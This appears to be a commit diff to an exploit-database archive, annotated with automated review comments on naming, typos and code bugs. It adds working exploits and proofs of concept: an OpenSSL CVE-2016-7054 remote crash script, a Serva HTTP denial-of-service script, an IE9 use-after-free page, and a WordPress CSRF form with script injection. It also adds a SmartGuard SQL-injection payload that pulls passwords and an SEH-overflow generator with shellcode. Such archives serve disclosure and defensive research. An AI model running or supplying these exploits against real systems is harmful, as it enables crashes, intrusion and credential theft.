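Review bot: for 29491 and 29492 the retitle removes "PATH_INFO Parameter", but PATH_INFO is the injection point here (the extra path after the script name, not a query parameter), so the new "'index.php' Cross-Site Scripting" and "'login.php' Cross-Site Scripting" no longer tell a reader where the input enters or why a query-string filter would miss it. Suggest keeping it, for example "'index.php' PATH_INFO Cross-Site Scripting".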
@ -36865,3 +36868,5 @@ id,file,description,date,author,platform,type,port
40889,platforms/cgi/webapps/40889.txt,"Netgear R7000 - Command Injection",2016-12-07,Acew0rm,cgi,webapps,0
40898,platforms/hardware/webapps/40898.txt,"Netgear R7000 - Cross-Site Scripting",2016-12-11,"Vincent Yiu",hardware,webapps,0
40901,platforms/hardware/webapps/40901.txt,"ARG-W4 ADSL Router - Multiple Vulnerabilities",2016-12-11,"Persian Hack Team",hardware,webapps,0
40904,platforms/php/webapps/40904.txt,"Smart Guard Network Manager 6.3.2 - SQL Injection",2016-12-03,"Rahul Raz",php,webapps,0
40908,platforms/php/webapps/40908.html,"WordPress Plugin Multisite Post Duplicator 0.9.5.1 - Cross-Site Request Forgery",2016-12-12,dxw,php,webapps,80
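Review bot: the new 40908 row sets the port field to 80 while the other webapps row added in this commit (40904) and the surrounding 40889/40898/40901 rows use 0; 40368 in an earlier hunk shows 80 does occur, but a CSRF PoC page (40908.html) has no listening port of its own, so 0 is the safer value unless the port column is meant to record the target's HTTP port, in which case the convention should be applied to 40904 too.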
139
platforms/ios/dos/40906.txt
Executable file
@ -0,0 +1,139 @@
Source: https://cxsecurity.com/issue/WLB-2016110046

iOS 10.1.x Remote memory corruption through certificate file
Credit: Maksymilian Arciemowicz from https://cxsecurity.com

--------------------------------------------------------------------------------------
0. Short description
Special crafted certificate file may lead to memory corruption of several processes and the vector attack may be through Mobile Safari or Mail app. Attacker may control the overflow through the certificate length in OCSP field

--------------------------------------------------------------------------------------
1. Possible vectors of attack
- Apple Mail (double click on certificate)
- Safari Mobile ( go to special crafted link eg https://cert.cx/appleios10/700k.php which will redirect you to CRT file )
- other unspecified

--------------------------------------------------------------------------------------
2. Symptoms of memory overflow
By appropriate length of the certificate, an attacker can trigger crash of:
- profiled
- Preferences
- other unexpected behaviors

--------------------------------------------------------------------------------------
3. Crash log:
- profiled
---------------------------------------------------------------
{"app_name":"profiled","app_version":"","bug_type":"109","timestamp":"2016-09-20 09:15:09.85 +0200","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXXXXX","slice_uuid":"XXXXXXXXXXXXXX","build_version":"","is_first_party":true,"share_with_app_devs":false,"name":"profiled"}
Incident Identifier: XXXXXXXXXXXXXX
CrashReporter Key: XXXXXXXXXXXXXX
Hardware Model: iPhone6,2
Process: profiled [1595]
Path: /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
Identifier: profiled
Version: ???
Code Type: ARM-64 (Native)
Role: Unspecified
Parent Process: launchd [1]
Coalition: <none> [253]


Date/Time: 2016-09-20 09:15:09.7892 +0200
Launch Time: 2016-09-20 09:15:01.1603 +0200
OS Version: iPhone OS 10.0.1 (14A403)
Report Version: 104

Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016e193ca0
Termination Signal: Segmentation fault: 11
Termination Reason: Namespace SIGNAL, Code 0xb
Terminating Process: exc handler [0]
Triggered by Thread: 2

---------------------------------------------------------------

- Preferences
---------------------------------------------------------------
{"app_name":"Preferences","timestamp":"2016-09-20 01:11:44.56 +0200","app_version":"1","slice_uuid":"XXXXXXXXXXX","adam_id":0,"build_version":"1.0","bundleID":"com.apple.Preferences","share_with_app_devs":false,"is_first_party":true,"bug_type":"109","os_version":"iPhone OS 10.0.1 (14A403)","incident_id":"XXXXXXXXXXX","name":"Preferences"}
Incident Identifier: XXXXXXXXXXX
CrashReporter Key: XXXXXXXXXXX
Hardware Model: iPhone6,2
Process: Preferences [1517]
Path: /Applications/Preferences.app/Preferences
Identifier: com.apple.Preferences
Version: 1.0 (1)
Code Type: ARM-64 (Native)
Role: Foreground
Parent Process: launchd [1]
Coalition: com.apple.Preferences [754]


Date/Time: 2016-09-20 01:11:43.4478 +0200
Launch Time: 2016-09-20 01:10:54.3002 +0200
OS Version: iPhone OS 10.0.1 (14A403)
Report Version: 104

Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Subtype: KERN_INVALID_ADDRESS at 0x000000016fc6df90
Termination Signal: Segmentation fault: 11
Termination Reason: Namespace SIGNAL, Code 0xb
Terminating Process: exc handler [0]
Triggered by Thread: 0
---------------------------------------------------------------


Logs:
==============================
Sep 20 20:17:02 xscxsc com.apple.CoreSimulator.SimDevice.27D...8F.launchd_sim[1905] (com.apple.managedconfiguration.profiled[3085]): Service exited due to signal: Segmentation fault: 11
Sep 20 20:17:02 xscxsc MobileSafari[2870]: (Error) MC: Queue data for acceptance error. Error: NSError:
Desc : Couldn’t communicate with a helper application.
Sugg : Try your operation again. If that fails, quit and relaunch the application and try again.
Domain : NSCocoaErrorDomain
Code : 4097
Extra info:
{
NSDebugDescription = "connection to service named com.apple.managedconfiguration.profiled";
}
Sep 20 20:17:02 xscxsc profiled[3133]: (Note ) profiled: Service starting...
==============================

--------------------------------------------------------------------------------------
4. PoC
https://cert.cx/appleios10/300k.php
https://cert.cx/appleios10/500k.php
https://cert.cx/appleios10/700k.php
https://cert.cx/appleios10/900k.php

or https://cert.cx/appleios10/expl.html

just click on this link by using Safari.

EDB Proofs of Concept Mirror:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40906.zip

--------------------------------------------------------------------------------------
5. Safari and sandbox
How is possible that safari don't ask user before run 'Preferences' app to start process of importing certificate? Safari automatically start new process without asking user for acceptance of this operation what can be exploited through http redirect to untrusted content.

--------------------------------------------------------------------------------------

6. References
CAPEC-44: Overflow Binary Resource File
https://capec.mitre.org/data/definitions/44.html
https://cert.cx/
https://cxsecurity.com/

Best Regards/Pozdrowienia/С наилучшими пожеланиями
Maksymilian Arciemowicz

References:

https://support.apple.com/HT207422
https://support.apple.com/HT207425
https://support.apple.com/HT207426
https://cert.cx/appleios10/300k.php
https://cert.cx/appleios10/500k.php
https://cert.cx/appleios10/700k.php
https://cert.cx/appleios10/900k.php
https://cert.cx/appleios10/expl.html
https://capec.mitre.org/data/definitions/44.html
|
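Review bot: section 5 asks why Safari launches 'Preferences' without confirmation, but the log lines in this hunk show that the process which actually dies is com.apple.managedconfiguration.profiled ("Service exited due to signal: Segmentation fault: 11"); MobileSafari only reports "Couldn't communicate with a helper application" (NSCocoaErrorDomain, code 4097) after the fact and then profiled restarts. Naming profiled as the component that parses the certificate file would make the crash scope clearer for readers assessing impact. Also, the PoC URLs (300k.php to 900k.php and expl.html) and the CAPEC-44 link appear twice, under '4. PoC'/'6. References' and again under the trailing 'References:' list; one list would do.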
123
platforms/linux/dos/40899.py
Executable file
@ -0,0 +1,123 @@
# Exploit Title: OpenSSL 1.1.0a & 1.1.0b Heap Overflow Remote DOS vulnerability
# Date: 11-12-2016
# Software Link: https://www.openssl.org/source/old/1.1.0/
# Exploit Author: Silverfox
# Contact: http://twitter.com/___Silverfox___
# Website: https://www.silverf0x00.com/
# CVE: CVE-2016-7054
# Category: Denial of Service
# Type: Remote
# Platform: Multiple

1. Description

Remote unauthenticated user can negotiate ChaCha20-Poly1305 cipher suites and send a message of sufficient length with a bad MAC to trigger the vulnerable code to zero out the heap space and force the vulnerable OpenSSL instance to crash.

https://blog.fortinet.com/2016/11/23/analysis-of-openssl-chacha20-poly1305-heap-buffer-overflow-cve-2016-7054
https://www.silverf0x00.com/overview-of-mac-algorithms-fuzzing-tls-and-finally-exploiting-cve-2016-7054-part-1/


2. Proof of Concept

a. Download and compile OpenSSL 1.1.0a or b
b. Run OpenSSL with the following switches: ./openssl-1.1.0a/bin/openssl s_server -cipher 'DHE-RSA-CHACHA20-POLY1305' -key cert.key -cert cert.crt -accept 443 -www -tls1_2 -msg
c. Download and run the exploit code (Under https://github.com/silverfoxy/tlsfuzzer package run test-cve-2016-7054.py at https://github.com/silverfoxy/tlsfuzzer/blob/master/scripts/test-cve-2016-7054.py)
d. OpenSSL Instance crashes causing DOS

### Exploit Code ###
'''
* In no event shall the author be liable
* for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
'''
from __future__ import print_function
import traceback
import sys

from tlsfuzzer.runner import Runner
from tlsfuzzer.messages import Connect, ClientHelloGenerator, \
ClientKeyExchangeGenerator, ChangeCipherSpecGenerator, \
FinishedGenerator, ApplicationDataGenerator, \
fuzz_encrypted_message
from tlsfuzzer.expect import ExpectServerHello, ExpectCertificate, \
ExpectServerHelloDone, ExpectChangeCipherSpec, ExpectFinished, \
ExpectAlert, ExpectClose, ExpectServerKeyExchange

from tlslite.constants import CipherSuite, AlertLevel, AlertDescription

def usage() :
return 'Usage ./{} Destination_IP Destination_Port'.format(sys.argv[0])

def main():
if len(sys.argv) < 3:
print(usage())
return -1
conversations = {}
# 16 chars: POLY1305 tag 128 bit
# Tampering one bit suffices to damage the mac
# The payload has to be long enough to trigger heap overflow
n = 15000
fuzzes = [(-1, 1)]
for pos, val in fuzzes:
conversation = Connect(sys.argv[1], int(sys.argv[2]))
node = conversation
ciphers = [CipherSuite.TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256]
node = node.add_child(ClientHelloGenerator(ciphers))
node = node.add_child(ExpectServerHello())
node = node.add_child(ExpectCertificate())
node = node.add_child(ExpectServerKeyExchange())
node = node.add_child(ExpectServerHelloDone())
node = node.add_child(ClientKeyExchangeGenerator())
node = node.add_child(ChangeCipherSpecGenerator())
node = node.add_child(FinishedGenerator())
node = node.add_child(ExpectChangeCipherSpec())
node = node.add_child(ExpectFinished())
node = node.add_child(fuzz_encrypted_message(
ApplicationDataGenerator(b"GET / HTTP/1.0\n" + n * b"A" + b"\n\n"), xors={pos:val}))
node = node.add_child(ExpectAlert(AlertLevel.fatal,
AlertDescription.bad_record_mac))
node = node.add_child(ExpectClose())

conversations["XOR position " + str(pos) + " with " + str(hex(val))] = \
conversation

# run the conversation
good = 0
bad = 0

for conversation_name in conversations:
conversation = conversations[conversation_name]
#print(conversation_name + "...")
runner = Runner(conversation)
res = True
try:
runner.run()
except:
print("Error while processing")
print(traceback.format_exc())
res = False
if res:
good+=1
print("OK")
else:
bad+=1

print("Test end")
print("successful: {0}".format(good))
print("failed: {0}".format(bad))

if bad > 0:
sys.exit(1)

if __name__ == "__main__":
main()
### End of Exploit Code ###

3. Solution:

Update OpenSSL to version 1.1.0c or later, versions earlier than 1.1.0a are not affected by this vulnerability.
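Review bot: the script never states which outcome means "vulnerable". The conversation expects a fatal bad_record_mac alert followed by a close; if the server dies before sending that alert, `runner.run()` raises, the bare `except:` (which also swallows KeyboardInterrupt) sets `res = False`, and the run is reported as "failed" with exit status 1, while a patched server that answers with the expected alert is counted as "OK". A comment above the result loop should spell out that inverted meaning. Smaller points: `usage()` prefixes `./{}` to sys.argv[0], which already holds the invoked path; `good`/`bad` are tallied per conversation but `fuzzes = [(-1, 1)]` only ever builds one; and the `xors={pos:val}` position of -1 should be documented next to the "16 chars: POLY1305 tag" comment so the reader knows which byte of the record is being altered.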
@ -1,14 +0,0 @@
source: http://www.securityfocus.com/bid/15017/info

myBloggie is prone to an SQL injection vulnerability. This is due to a lack of sanitization of user-supplied input before passing it on to SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation.

<HTML><BODY>
<form
action="http://www.example.com/myBloggie/index.php?mode=search"
method="post" name="search" onsubmit="return
checkForm(this)"><center><input type="text"
name="keyword" size="12" value="'SQLInjection"> <input
type="submit" value="Inject this"></center></form>
</BODY></HTML>
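Review bot: the whole file is deleted, including its only provenance line (securityfocus bid/15017), but nothing in the hunk records why (superseded, duplicate, or moved under a renamed entry); a removal of an archived advisory should carry that reason so the history stays searchable.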
@ -1,12 +0,0 @@
source: http://www.securityfocus.com/bid/18241/info

MyBloggie is prone to multiple remote file-include vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

Update: Conflicting reports indicate that this issue does not exist in MyBloggie. This BID will be updated when more details are available.

http://www.example.com/blog/admin.php?mybloggie_root_path=[evil script]

http://www.example.com/blog/scode.php?mybloggie_root_path=[evil script]
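Review bot: the removed text itself says "Conflicting reports indicate that this issue does not exist in MyBloggie", which is presumably the reason for dropping it; that justification should be stated with the deletion rather than left to be inferred from the removed lines.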
27
platforms/php/webapps/40904.txt
Executable file
@ -0,0 +1,27 @@
# Exploit Title: SQL Injection In Smart Guard Network Manager Api
# Date: 03/12/2016
# Exploit Author: Rahul Raz
# Vendor Homepage: http://www.xsinfoways.com/
# Software Name: Smart Guard Network Manager
# Version: 6.3.2
# Tested on: Ubuntu Linux

Vulnerability type: CWE-89: Improper Neutralization of Special Elements
used in an SQL Command ('SQL Injection')

The menu_id GET parameter on <base url>/view_logs/search_all_history.php in
not filtered properly and leads to SQL Injection

Authentication Required: No

SQL injec type- error/xpath.

Any unauthenticated user can inject SQL commands on the <base-url>
/view_logs/search_all_history.php?menu_id=-466 and extractvalue(1,(select
make_set(511,0,SUBSTRING(password,1,20),1) from
login_master limit 0,1 ))-- -

So an user can fetch admin details and can easily get root on that server
if server is SmartGuard 6.0A Revolutions as php runs as user root by
default.
This this vulnerability can make whole server vulnerable .
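Review bot: the header says "Version: 6.3.2" but the impact paragraph ties the root-privilege claim to "SmartGuard 6.0A Revolutions", so it is unclear which version was tested and whether the "php runs as user root by default" condition applies to 6.3.2; the impact statement should name the version it was verified on. The file also carries no fix or mitigation line (vendor patch, workaround, or "no fix available"). Typos: "in not filtered properly" should read "is not filtered properly", and "This this vulnerability" doubles a word.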
64
platforms/php/webapps/40908.html
Executable file
@ -0,0 +1,64 @@
<!--
Details
================
Software: Multisite Post Duplicator
Version: 0.9.5.1
Homepage: http://wordpress.org/plugins/multisite-post-duplicator/
Advisory report: https://security.dxw.com/advisories/csrf-vulnerability-in-multisite-post-duplicator-could-allow-an-attacker-to-do-almost-anything-an-admin-user-can-do/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
CSRF vulnerability in Multisite Post Duplicator could allow an attacker to do almost anything an admin user can do

Vulnerability
================
Contains a CSRF vulnerability which can copy content from one site of a multisite installation to another.
This could be used to add arbitrary HTML to the front-end of the site (which could be used for defacement, harvesting login credentials from authenticated users, or could be used to do virtually anything a logged-in admin user can do).
This could also be used to view content not meant to be published.

Proof of concept
================
Some of these values may need adjusting depending on the post IDs, blog IDs, etc.
-->

<form method=\"POST\" action=\"http://localhost/wp-admin/tools.php?page=mpd\">
<input type=\"text\" name=\"mpd-post-status\" value=\"draft\">
<input type=\"text\" name=\"mdp-prefix\" value=\"<script>alert(1)</script>\">
<input type=\"text\" name=\"action\" value=\"add_foobar\">
<input type=\"text\" name=\"el0\" value=\"post\">
<input type=\"text\" name=\"el1\" value=\"1\">
<input type=\"text\" name=\"el2\" value=\"1\">
<input type=\"text\" name=\"el3\" value=\"1\">
<input type=\"text\" name=\"duplicate-submit\" value=\"Duplicate\">
<input type=\"submit\">
</form>

<!--
Mitigations
================
Update to version 1.1.3 or later.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline
================

2016-11-01: Discovered
2016-12-07: Tested version 1.1.3 and found the plugin no longer vulnerable to the attack as described
2016-12-09: Advisory published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.
-->
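Review bot: the form markup uses backslash-escaped quotes (`<form method=\"POST\" action=\"http://localhost/wp-admin/tools.php?page=mpd\">` and every `<input>` below it), which in a .html file are literal backslashes inside the attribute values, so the committed PoC does not parse the way the advisory intends; the escaping looks like a leftover from embedding the markup in a string and should be stripped. Minor: "with 14 days" should read "within 14 days", and "CVE: Awaiting assignment" is a field that will need updating once an ID is issued.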
72
platforms/windows/dos/40905.py
Executable file
@ -0,0 +1,72 @@
#!/usr/bin/env python
#
#
# Serva 3.0.0 HTTP Server Module Remote Denial of Service Exploit
#
#
# Vendor: Patrick Masotta
# Product web page: http://www.vercot.com
# Affected version: 3.0.0.1001 (Community, Pro, 32/64bit)
#
# Summary: Serva is a light (~3 MB), yet powerful Microsoft Windows application.
# It was conceived mainly as an Automated PXE Server Solution Accelerator. It bundles
# on a single exe all of the underlying server protocols and services required by the
# most complex PXE network boot/install scenarios simultaneously delivering Windows and
# non-Windows assets to BIOS and UEFI based targets.
#
# Desc: The vulnerability is caused by the HTML (httpd) module and how it handles TCP requests.
# This can be exploited to cause a denial of service attack resulting in application crash.
#
# ----------------------------------------------------------------------------
#
# (c1c.4bc): C++ EH exception - code e06d7363 (first chance)
# (c1c.4bc): C++ EH exception - code e06d7363 (!!! second chance !!!)
# *** WARNING: Unable to verify checksum for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
# *** ERROR: Module load completed but symbols could not be loaded for C:\Users\lqwrm\Desktop\Serva_Community_32_v3.0.0\Serva32.exe
# eax=03127510 ebx=03127670 ecx=00000003 edx=00000000 esi=03127670 edi=031276a0
# eip=74a1c54f esp=03127510 ebp=03127560 iopl=0 nv up ei pl nz ac po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000212
# KERNELBASE!RaiseException+0x58:
# 74a1c54f c9 leave
# 0:013> kb
# # ChildEBP RetAddr Args to Child
# 00 03127560 004abaaf e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x58
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 01 03127598 004cc909 031275b8 005e13e8 6ca23755 Serva32+0xabaaf
# 02 03127608 004085d3 0211ecf8 03127670 ffffffff Serva32+0xcc909
# 03 0312761c 004089a5 031276a0 fffffffd 00000004 Serva32+0x85d3
# 04 0312764c 00408f01 03127670 fffffffd 00000004 Serva32+0x89a5
# 05 03127698 00413b38 00000000 0040007a 00000000 Serva32+0x8f01
# 06 031277d8 00000000 00000000 00000000 00000000 Serva32+0x13b38
#
# ----------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 7 Professional SP1 (EN)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2016-5378
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5378.php
#
#
# 17.11.2016
#

import sys,socket

if len(sys.argv) < 3:

print '\nUsage: ' + sys.argv[0] + ' <target> <port>\n'
print 'Example: ' + sys.argv[0] + ' 172.19.0.214 80\n'
sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((host, port))
s.settimeout(251)
s.send('z')
s.close
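Review bot: the last line, `s.close`, is a bare attribute reference rather than a call, so the socket is never closed explicitly; it should be `s.close()`. Two smaller points in the same block: `connect = s.connect((host, port))` stores None, since connect returns nothing, and `s.settimeout(251)` is set only after the connect, so an unreachable host blocks on the default (unbounded) timeout rather than the intended one. The `print '...'` statements tie the script to Python 2 while the `#!/usr/bin/env python` shebang does not say so; a `python2` shebang or a header note would avoid a SyntaxError on modern systems. The WinDbg crash context in the header is the kind of evidence an exploit-db entry should carry, so keep it.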
47
platforms/windows/dos/40907.html
Executable file
@ -0,0 +1,47 @@
<!--
Source: http://blog.skylined.nl/20161212001.html

Synopsis
A specially crafted web-page can trigger a use-after-free vulnerability in Microsoft Internet Explorer 9. I did not investigate this vulnerability thoroughly, so I cannot speculate on the potential impact or exploitability.

Known affected software and attack vectors
Microsoft Internet Explorer 9
An attacker would need to get a target user to open a specially crafted web-page. Disabling JavaScript should prevent an attacker from triggering the vulnerable code path.
Details
This bug was found back when I had very little knowledge and tools to do analysis on use-after-free bugs, so I have no details to share. EIP revealed that this was a use-after-free vulnerability. I have included a number of reports created using a predecessor of BugId below.

Repro.html:
-->

<!DOCTYPE html>
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" >
<script>
function go() {
document.execCommand('SelectAll');
document.execCommand('superscript');
setTimeout(function() {
oSupElement=document.getElementsByTagName('sup')[0];
oSupElement.swapNode(document.documentElement);
}, 0);
}
</script>
</head>
<body onload="go()">
<address></address>
<fieldset></fieldset>
</body>
</html>

<!--
Time-line
27 September 2012: This vulnerability was found through fuzzing.
3 December 2012: This vulnerability was submitted to EIP.
10 December 2012: This vulnerability was rejected by EIP.
12 December 2012: This vulnerability was submitted to ZDI.
25 January 2013: This vulnerability was acquired by ZDI.
15 February 2013: This vulnerability was disclosed to Microsoft by ZDI.
27 June 2013: This vulnerability was address by Microsoft in MS13-047.
12 December 2016: Details of this vulnerability are released.
-->
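Review bot: the Details paragraph says "I have included a number of reports created using a predecessor of BugId below", but the file contains only Repro.html and the time-line, so either the referenced reports are missing from this commit or the sentence should be dropped (the blog source is linked, which may be where they live). Typo in the time-line: "was address by Microsoft" should read "was addressed by Microsoft". The mitigation given (disabling JavaScript) is consistent with the repro, whose trigger runs entirely from `onload="go()"`.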
32
platforms/windows/local/40903.py
Executable file
@ -0,0 +1,32 @@
#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################

def write_poc(fname, buffer):
fhandle = open(fname , 'wb')
fhandle.write(buffer)
fhandle.close()

fname="poc.txt"
buf = '\x41' * 0xfe0

#########################
# Shellcode
# MessageBox ad infinitum
#########################
shellcode = ("\x68\x24\x3F\x30\x41\x58\x35\x70\x41\x70"
"\x41\x50\x59\x68\x41\x41\x41\x41\x58\x35"
"\x41\x41\x41\x41\x50\x50\x50\x50\x51\xC3")

junk = '\x41' * 0x5e
jmp = '\xeb\x82\x41\x41'
nseh = '\xec\x14\x40\x00'
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)
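Review bot: the variable names do not match the layout the last lines build: in `buffer = buf + shellcode + junk + jmp + nseh`, the 4-byte `jmp` value occupies the next-SEH slot and `nseh` holds the handler address, so `jmp`/`nseh` should be named `nseh`/`seh` to avoid misleading readers. The script is Python 2 only (`write_poc` opens the file in 'wb' and writes a str; `shellcode` and `buf` are str escape sequences), and the `#!python` shebang does not pin that. The "MessageBox ad infinitum" comment is the only description of the 30-byte payload; a note on which module the 0x004014ec handler address comes from would let readers confirm the "Tested on: Win7 SP1" claim against their own copy of the binary.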